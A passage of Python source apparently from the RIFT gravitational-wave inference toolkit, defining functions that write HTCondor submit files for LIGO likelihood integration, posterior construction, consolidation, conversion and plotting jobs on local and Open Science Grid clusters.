    Write a submit file for launching jobs to plot likelihood contours over mchirp and eta from coalesced ILE output
"""
exe = exe or which("plot_like_contours")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("show-points", None)
plot_job.add_opt("dimension1", "mchirp")
plot_job.add_opt("dimension2", "eta")
plot_job.add_opt("input-cache", "ILE_all.cache")
plot_job.add_opt("log-evidence", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '1024')
return plot_job, plot_sub_name
def write_tri_plot_sub(tag='plot_tri', injection_file=None, exe=None, log_dir=None, output_dir="./"):
"""
    Write a submit file for launching jobs to make triplot (corner) plots from coalesced ILE output
"""
exe = exe or which("make_triplot")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("output", "ILE_triplot_$(macromassid).png")
if injection_file is not None:
plot_job.add_opt("injection", injection_file)
plot_job.add_arg("ILE_$(macromassid).sqlite")
plot_job.add_condor_cmd('getenv', 'True')
#plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_1dpos_plot_sub(tag='1d_post_plot', exe=None, log_dir=None, output_dir="./"):
"""
    Write a submit file for launching jobs to produce 1D cumulative posterior plots from ILE output
"""
exe = exe or which("postprocess_1d_cumulative")
plot_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
plot_sub_name = tag + '.sub'
plot_job.set_sub_file(plot_sub_name)
#
# Logging options
#
uniq_str = "$(cluster)-$(process)"
plot_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
plot_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
plot_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
plot_job.add_opt("save-sampler-file", "ILE_$(macromassid).sqlite")
plot_job.add_opt("disable-triplot", None)
plot_job.add_opt("disable-1d-density", None)
plot_job.add_condor_cmd('getenv', 'True')
plot_job.add_condor_cmd('request_memory', '2048')
return plot_job, plot_sub_name
def write_CIP_sub(tag='integrate', exe=None, input_net='all.net',output='output-ILE-samples',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=8192,arg_vals=None, no_grid=False,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
exe = exe or which("util_ConstructIntrinsicPosterior_GenericCoordinates.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("fname", input_net)
ile_job.add_opt("fname-output-samples", out_dir+"/"+output)
ile_job.add_opt("fname-output-integral", out_dir+"/"+output)
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
if "fname_output_samples" in kwargs and kwargs["fname_output_samples"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_samples"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
if "fname_output_integral" in kwargs and kwargs["fname_output_integral"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["fname_output_integral"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
return ile_job, ile_sub_name
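# Usage sketch (illustrative only -- the file names, argument string, and exact
# glue.pipeline calls below are hypothetical, not taken from a production workflow):
#
#   cip_job, cip_sub = write_CIP_sub(tag='CIP', input_net='all.net',
#       output='posterior_samples', out_dir='.', log_dir='logs/',
#       arg_str='--parameter mc --parameter eta --mc-range [10,20]')
#   cip_job.write_sub_file()
#   dag = pipeline.CondorDAG('logs/cip.log')
#   node = pipeline.CondorDAGNode(cip_job)
#   dag.add_node(node)
#   dag.set_dag_file('cip_workflow')
#   dag.write_dag()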
def write_puff_sub(tag='puffball', exe=None, input_net='output-ILE-samples',output='puffball',universe="vanilla",out_dir=None,log_dir=None, use_eos=False,ncopies=1,arg_str=None,request_memory=1024,arg_vals=None, no_grid=False,**kwargs):
"""
    Write a submit file for the puffball calculation (util_ParameterPuffball.py), which broadens an input grid.
    Outputs:
        - An instance of the CondorDAGJob that was generated for the puffball job
"""
exe = exe or which("util_ParameterPuffball.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_opt("inj-file", input_net)
ile_job.add_opt("inj-file-out", output)
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
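# Usage sketch (illustrative; the grid file names are hypothetical):
#
#   puff_job, puff_sub = write_puff_sub(tag='puffball',
#       input_net='overlap-grid-0.xml.gz', output='overlap-grid-puffed.xml.gz',
#       log_dir='logs/', arg_str='--parameter mc --parameter eta')
#   puff_job.write_sub_file()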
def write_ILE_sub_simple(tag='integrate', exe=None, log_dir=None, use_eos=False,simple_unique=False,ncopies=1,arg_str=None,request_memory=4096,request_gpu=False,request_disk=False,arg_vals=None, transfer_files=None,transfer_output_files=None,use_singularity=False,use_osg=False,use_simple_osg_requirements=False,singularity_image=None,use_cvmfs_frames=False,frames_dir=None,cache_file=None,fragile_hold=False,max_runtime_minutes=None,condor_commands=None,**kwargs):
"""
Write a submit file for launching jobs to marginalize the likelihood over intrinsic parameters.
Inputs:
Outputs:
- An instance of the CondorDAGJob that was generated for ILE
"""
if use_singularity and (singularity_image == None) :
print(" FAIL : Need to specify singularity_image to use singularity ")
        sys.exit(1)  # exit nonzero on failure
if use_singularity and (frames_dir == None) and (cache_file == None) :
print(" FAIL : Need to specify frames_dir or cache_file to use singularity (at present) ")
        sys.exit(1)  # exit nonzero on failure
if use_singularity and (transfer_files == None) :
print(" FAIL : Need to specify transfer_files to use singularity at present! (we will append the prescript; you should transfer any PSDs as well as the grid file ")
        sys.exit(1)  # exit nonzero on failure
exe = exe or which("integrate_likelihood_extrinsic")
frames_local = None
if use_singularity:
path_split = exe.split("/")
print((" Executable: name breakdown ", path_split, " from ", exe))
singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
if 'SINGULARITY_BASE_EXE_DIR' in list(os.environ.keys()) :
singularity_base_exe_path = os.environ['SINGULARITY_BASE_EXE_DIR']
else:
# singularity_base_exe_path = "/opt/lscsoft/rift/MonteCarloMarginalizeCode/Code/" # should not hardcode this ...!
singularity_base_exe_path = "/usr/bin/" # should not hardcode this ...!
exe=singularity_base_exe_path + path_split[-1]
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
elif use_osg: # NOT using singularity!
if not(frames_dir is None):
frames_local = frames_dir.split("/")[-1]
path_split = exe.split("/")
exe=path_split[-1] # pull out basename
exe_here = 'my_wrapper.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ['../my_wrapper.sh']
with open(exe_here,'w') as f:
f.write("#! /bin/bash \n")
f.write(r"""
#!/bin/bash
# Modules and scripts run directly from repository
# Note the repo and branch are self-referential ! Not a robust solution long-term
# Exit on failure:
# set -e
export INSTALL_DIR=research-projects-RIT
export ILE_DIR=${INSTALL_DIR}/MonteCarloMarginalizeCode/Code
export PATH=${PATH}:${ILE_DIR}
export PYTHONPATH=${PYTHONPATH}:${ILE_DIR}
export GW_SURROGATE=gwsurrogate
git clone https://git.ligo.org/richard-oshaughnessy/research-projects-RIT.git
pushd ${INSTALL_DIR}
git checkout temp-RIT-Tides-port_master-GPUIntegration
popd
ls
cat local.cache
echo Starting ...
./research-projects-RIT/MonteCarloMarginalizeCode/Code/""" + exe + " $@ \n")
os.system("chmod a+x "+exe_here)
exe = exe_here # update executable
ile_job = pipeline.CondorDAGJob(universe="vanilla", executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
#
# Add options en mass, by brute force
#
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Macro based options.
# - select EOS from list (done via macro)
# - pass spectral parameters
#
# ile_job.add_var_opt("event")
if use_eos:
ile_job.add_var_opt("using-eos")
requirements =[]
#
# Logging options
#
uniq_str = "$(macroevent)-$(cluster)-$(process)"
if simple_unique:
uniq_str = "$(macroevent)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
# Add lame initial argument
if "output_file" in kwargs and kwargs["output_file"] is not None:
#
# Need to modify the output file so it's unique
#
ofname = kwargs["output_file"].split(".")
ofname, ext = ofname[0], ".".join(ofname[1:])
ile_job.add_file_opt("output-file", "%s-%s.%s" % (ofname, uniq_str, ext))
del kwargs["output_file"]
if "save_samples" in kwargs and kwargs["save_samples"] is True:
ile_job.add_opt("save-samples", None)
del kwargs["save_samples"]
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
if cache_file:
ile_job.add_opt("cache-file",cache_file)
ile_job.add_var_opt("event")
if not use_osg:
ile_job.add_condor_cmd('getenv', 'True')
ile_job.add_condor_cmd('request_memory', str(request_memory))
if not(request_disk is False):
ile_job.add_condor_cmd('request_disk', str(request_disk))
nGPUs =0
if request_gpu:
nGPUs=1
ile_job.add_condor_cmd('request_GPUs', str(nGPUs))
if use_singularity:
# Compare to https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('request_CPUs', str(1))
ile_job.add_condor_cmd('transfer_executable', 'False')
ile_job.add_condor_cmd("+SingularityBindCVMFS", 'True')
ile_job.add_condor_cmd("+SingularityImage", '"' + singularity_image + '"')
requirements = []
requirements.append("HAS_SINGULARITY=?=TRUE")
# if not(use_simple_osg_requirements):
# requirements.append("HAS_CVMFS_LIGO_CONTAINERS=?=TRUE")
#ile_job.add_condor_cmd("requirements", ' (IS_GLIDEIN=?=True) && (HAS_LIGO_FRAMES=?=True) && (HAS_SINGULARITY=?=TRUE) && (HAS_CVMFS_LIGO_CONTAINERS=?=TRUE)')
if use_cvmfs_frames:
requirements.append("HAS_LIGO_FRAMES=?=TRUE")
ile_job.add_condor_cmd('use_x509userproxy','True')
if 'X509_USER_PROXY' in list(os.environ.keys()):
print(" Storing copy of X509 user proxy -- beware expiration! ")
cwd = os.getcwd()
fname_proxy = cwd +"/my_proxy" # this can get overwritten, that's fine - just renews, feature not bug
os.system("cp ${X509_USER_PROXY} " + fname_proxy)
# ile_job.add_condor_cmd('x509userproxy',os.environ['X509_USER_PROXY'])
ile_job.add_condor_cmd('x509userproxy',fname_proxy)
if use_osg:
if not(use_simple_osg_requirements):
requirements.append("IS_GLIDEIN=?=TRUE")
# avoid black-holing jobs to specific machines that consistently fail. Uses history attribute for ad
ile_job.add_condor_cmd('periodic_release','(HoldReasonCode == 45) && (HoldReasonSubCode == 0)')
ile_job.add_condor_cmd('job_machine_attrs','Machine')
ile_job.add_condor_cmd('job_machine_attrs_history_length','4')
# for indx in [1,2,3,4]:
# requirements.append("TARGET.GLIDEIN_ResourceName=!=MY.MachineAttrGLIDEIN_ResourceName{}".format(indx))
if "OSG_DESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+DESIRED_SITES',os.environ["OSG_DESIRED_SITES"])
if "OSG_UNDESIRED_SITES" in os.environ:
ile_job.add_condor_cmd('+UNDESIRED_SITES',os.environ["OSG_UNDESIRED_SITES"])
# Some options to automate restarts, acts on top of RETRY in dag
if fragile_hold:
ile_job.add_condor_cmd("periodic_release","(NumJobStarts < 5) && ((CurrentTime - EnteredCurrentStatus) > 600)")
ile_job.add_condor_cmd("on_exit_hold","(ExitBySignal == True) || (ExitCode != 0)")
if use_singularity or use_osg:
# Set up file transfer options
ile_job.add_condor_cmd("when_to_transfer_output",'ON_EXIT')
# Stream log info
ile_job.add_condor_cmd("stream_error",'True')
ile_job.add_condor_cmd("stream_output",'True')
# Create prescript command to set up local.cache, only if frames are needed
# if we have CVMFS frames, we should be copying local.cache over directly, with it already populated !
if not(frames_local is None) and not(use_cvmfs_frames): # should be required for singularity or osg
try:
lalapps_path2cache=os.environ['LALAPPS_PATH2CACHE']
except KeyError:
print("Variable LALAPPS_PATH2CACHE is unset, assume default lalapps_path2cache is appropriate")
lalapps_path2cache="lalapps_path2cache"
cmdname = 'ile_pre.sh'
if transfer_files is None:
transfer_files = []
transfer_files += ["../ile_pre.sh", frames_dir] # assuming default working directory setup
with open(cmdname,'w') as f:
f.write("#! /bin/bash -xe \n")
f.write( "ls "+frames_local+" | {lalapps_path2cache} 1> local.cache \n".format(lalapps_path2cache=lalapps_path2cache)) # Danger: need user to correctly specify local.cache directory
# Rewrite cache file to use relative paths, not a file:// operation
f.write(" cat local.cache | awk '{print $1, $2, $3, $4}' > local_stripped.cache \n")
f.write("for i in `ls " + frames_local + "`; do echo "+ frames_local + "/$i; done > base_paths.dat \n")
f.write("paste local_stripped.cache base_paths.dat > local_relative.cache \n")
f.write("cp local_relative.cache local.cache \n")
os.system("chmod a+x ile_pre.sh")
ile_job.add_condor_cmd('+PreCmd', '"ile_pre.sh"')
# if use_osg:
# ile_job.add_condor_cmd("+OpenScienceGrid",'True')
if use_cvmfs_frames:
transfer_files += ["../local.cache"]
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
# Write requirements
# From https://github.com/lscsoft/lalsuite/blob/master/lalinference/python/lalinference/lalinference_pipe_utils.py
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
if not transfer_files is None:
if not isinstance(transfer_files, list):
fname_str=transfer_files
else:
fname_str = ','.join(transfer_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_input_files', fname_str)
ile_job.add_condor_cmd('should_transfer_files','YES')
if not transfer_output_files is None:
if not isinstance(transfer_output_files, list):
fname_str=transfer_output_files
else:
fname_str = ','.join(transfer_output_files)
fname_str=fname_str.strip()
ile_job.add_condor_cmd('transfer_output_files', fname_str)
# Periodic remove: kill jobs running longer than max runtime
# https://stackoverflow.com/questions/5900400/maximum-run-time-in-condor
if not(max_runtime_minutes is None):
remove_str = 'JobStatus =?= 2 && (CurrentTime - JobStartDate) > ( {})'.format(60*max_runtime_minutes)
ile_job.add_condor_cmd('periodic_remove', remove_str)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
if condor_commands is not None:
        for cmd, value in condor_commands.items():  # .iteritems() was python2-only
ile_job.add_condor_cmd(cmd, value)
return ile_job, ile_sub_name
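# Usage sketch (illustrative; every file name, channel, and extra option below is
# hypothetical and passed through **kwargs). Each DAG node selects one row of the
# intrinsic grid via the $(macroevent) macro created by add_var_opt("event"):
#
#   ile_job, ile_sub = write_ILE_sub_simple(tag='ILE', log_dir='logs/',
#       arg_str='--l-max 2 --n-max 2000000', request_memory=4096,
#       cache_file='local.cache', sim_xml='overlap-grid.xml.gz',
#       channel_name=['H1=GDS-CALIB_STRAIN'], psd_file=['H1=H1-psd.xml.gz'])
#   node = pipeline.CondorDAGNode(ile_job)
#   node.add_macro("macroevent", 0)   # analyze row 0 of the grid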
def write_consolidate_sub_simple(tag='consolidate', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_ILEdagPostprocess.sh")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
# This is a hack since CondorDAGJob hides the queue property
ile_job._CondorJob__queue = ncopies
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
ile_job.add_arg(base) # what directory to load
ile_job.add_arg(target) # where to put the output (label), in CWD
#
# NO OPTIONS
#
# arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
# arg_str = arg_str.lstrip('-')
# ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file("%s%s-%s.out" % (log_dir, tag, uniq_str))
#
# Add normal arguments
# FIXME: Get valid options from a module
#
for opt, param in list(kwargs.items()):
if isinstance(param, list) or isinstance(param, tuple):
# NOTE: Hack to get around multiple instances of the same option
for p in param:
ile_job.add_arg("--%s %s" % (opt.replace("_", "-"), str(p)))
elif param is True:
ile_job.add_opt(opt.replace("_", "-"), None)
elif param is None or param is False:
continue
else:
ile_job.add_opt(opt.replace("_", "-"), str(param))
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
###
### SUGGESTION FROM STUART (for later)
# request_memory = ifthenelse( (LastHoldReasonCode=!=34 && LastHoldReasonCode=!=26), InitialRequestMemory, int(1.5 * NumJobStarts * MemoryUsage) )
# periodic_release = ((HoldReasonCode =?= 34) || (HoldReasonCode =?= 26))
    # This will automatically release a job that is put on hold for using too much memory, with a 50% increased memory request each time.
return ile_job, ile_sub_name
def write_unify_sub_simple(tag='unify', exe=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1,no_grid=False, **kwargs):
"""
Write a submit file for launching a consolidation job
util_ILEdagPostprocess.sh # suitable for ILE consolidation.
arg_str # add argument (used for NR postprocessing, to identify group)
"""
exe = exe or which("util_CleanILE.py") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
# Write unify.sh
# - problem of globbing inside condor commands
# - problem that *.composite files from intermediate results will generally NOT be present
cmdname ='unify.sh'
base_str = ''
if not (base is None):
base_str = ' ' + base +"/"
with open(cmdname,'w') as f:
f.write("#! /usr/bin/env bash\n")
f.write( "ls " + base_str+"*.composite 1>&2 \n") # write filenames being concatenated to stderr
f.write( exe + base_str+ "*.composite \n")
st = os.stat(cmdname)
import stat
os.chmod(cmdname, st.st_mode | stat.S_IEXEC)
ile_job = pipeline.CondorDAGJob(universe=universe, executable=base_str+cmdname) # force full prefix
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
# Add manual options for input, output
# ile_job.add_arg('*.composite') # what to do
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(target)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
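# Usage sketch (illustrative). The job runs the generated unify.sh, concatenating
# <base>/*.composite into one cleaned file; stdout is redirected to 'target':
#
#   unify_job, unify_sub = write_unify_sub_simple(tag='unify', base='iteration_0',
#       target='all.net', log_dir='logs/')
#   unify_job.write_sub_file()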
def write_convert_sub(tag='convert', exe=None, file_input=None,file_output=None,universe="vanilla",arg_str='',log_dir=None, use_eos=False,ncopies=1, no_grid=False,**kwargs):
"""
Write a submit file for launching a 'convert' job
convert_output_format_ile2inference
"""
exe = exe or which("convert_output_format_ile2inference") # like cat, but properly accounts for *independent* duplicates. (Danger if identical). Also strips large errors
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
if not(arg_str is None or len(arg_str)<2):
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
ile_job.add_arg(file_input)
#
# Logging options
#
uniq_str = "$(macromassid)-$(cluster)-$(process)"
ile_job.set_log_file("%s%s-%s.log" % (log_dir, tag, uniq_str))
ile_job.set_stderr_file("%s%s-%s.err" % (log_dir, tag, uniq_str))
ile_job.set_stdout_file(file_output)
ile_job.add_condor_cmd('getenv', 'True')
# To change interactively:
# condor_qedit
# for example:
# for i in `condor_q -hold | grep oshaughn | awk '{print $1}'`; do condor_qedit $i RequestMemory 30000; done; condor_release -all
ile_job.add_condor_cmd('requirements', '&&'.join('({0})'.format(r) for r in requirements))
# no grid
if no_grid:
ile_job.add_condor_cmd("+DESIRED_SITES",'"nogrid"')
ile_job.add_condor_cmd("+flock_local",'true')
try:
ile_job.add_condor_cmd('accounting_group',os.environ['LIGO_ACCOUNTING'])
ile_job.add_condor_cmd('accounting_group_user',os.environ['LIGO_USER_NAME'])
    except KeyError:
        print(" LIGO accounting information not available. You must add this manually to %s !" % ile_sub_name)
return ile_job, ile_sub_name
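# Usage sketch (illustrative; file names are hypothetical). Converts flat ILE/CIP
# samples to a LALInference-style posterior file, written via the job's stdout:
#
#   conv_job, conv_sub = write_convert_sub(tag='convert',
#       file_input='posterior_samples.dat',
#       file_output='posterior_samples.converted.dat', log_dir='logs/')
#   conv_job.write_sub_file()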
def write_test_sub(tag='converge', exe=None,samples_files=None, base=None,target=None,universe="vanilla",arg_str=None,log_dir=None, use_eos=False,ncopies=1, **kwargs):
"""
Write a submit file for launching a convergence test job
"""
exe = exe or which("convergence_test_samples.py")
ile_job = pipeline.CondorDAGJob(universe=universe, executable=exe)
requirements=[]
if universe=='local':
requirements.append("IS_GLIDEIN=?=undefined")
ile_sub_name = tag + '.sub'
ile_job.set_sub_file(ile_sub_name)
arg_str = arg_str.lstrip() # remove leading whitespace and minus signs
arg_str = arg_str.lstrip('-')
ile_job.add_opt(arg_str,'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# ile_job.add_opt(arg_str[2:],'') # because we must be idiotic in how we pass arguments, I strip off the first two elements of the line
# Add options for two parameter files
for name in samples_files:
